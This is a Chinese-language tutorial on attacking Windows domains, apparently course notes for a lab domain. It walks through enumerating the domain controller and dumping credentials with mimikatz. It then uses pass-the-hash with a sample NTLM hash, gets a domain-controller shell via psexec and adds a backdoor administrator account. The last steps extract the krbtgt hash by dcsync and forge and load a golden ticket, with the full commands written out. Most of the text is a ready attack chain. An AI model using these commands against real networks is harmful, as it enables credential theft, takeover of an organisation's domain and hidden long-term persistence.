域渗透
1.
安装域
接着点击安装向导
加入域:
需要设置dns服务器为域控机
域控可以登陆任意域中的电脑
Windows认证协议 - Kerberos,也可以叫做票据
我们查看域控 在cmd输入
net user /domain
还可以在dns里查看,一般dns都是域控机
当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权
指令:
psexec -i -d -s cmd.exe//获取权限
然后再次输入net user /domain,就可以获取域控的名字,同样我们用猕猴桃能够抓取到域控的密文密码
sekurlsa::logonpasswords//猕猴桃抓取密码
仅仅是这样,我们是无法做到访问域控的,这个时候我们就需要用到哈希传递
在猕猴桃内:
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:327a5087d83c664096919afbd40f21c8 //登陆用户 域地址 ntlm加密值
然后就会弹出一个命令框,这就是域控端,我们可以去查看C盘文件
dir \\WIN-D6PMU0BTMC1.zkaq.cn\c
也可以利用Windows的官方工具psexec,进行提权成域控cmd
在这个框内输入
PsExec.exe \\WIN-D6PMU0BTMC1.zkaq.cn cmd
成功变成域控的cmd
net user nf 密码 /add//创建用户名
net localgroup administrators nf /add
这样就能成功登陆域控机
但是为了维持长久的控制,管理员会经常进行更换密码
这就是需要做到黄金票据
黄金票据
域渗透中其实有金银票据,一个是黄金票据一个是白银票据。一个用的是域控用户账户,一个用的是krbtgt账户
金票权限是最大的,我们主讲黄金票据。
这个必须要登陆域控机,上传一个猕猴桃,猕猴桃先来个二连,再输入这串命令
lsadump::dcsync /user:krbtgt
我们需要记录一串SID,记住SID是不包含-502的,千万别把-502写进去
还要Hash NTML
制作票据,然后在复制到猕猴桃内
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi [制作票据]
kerberos::ptt administrator.kiribi [加载票据]//直接在普通cmd行内执行就行了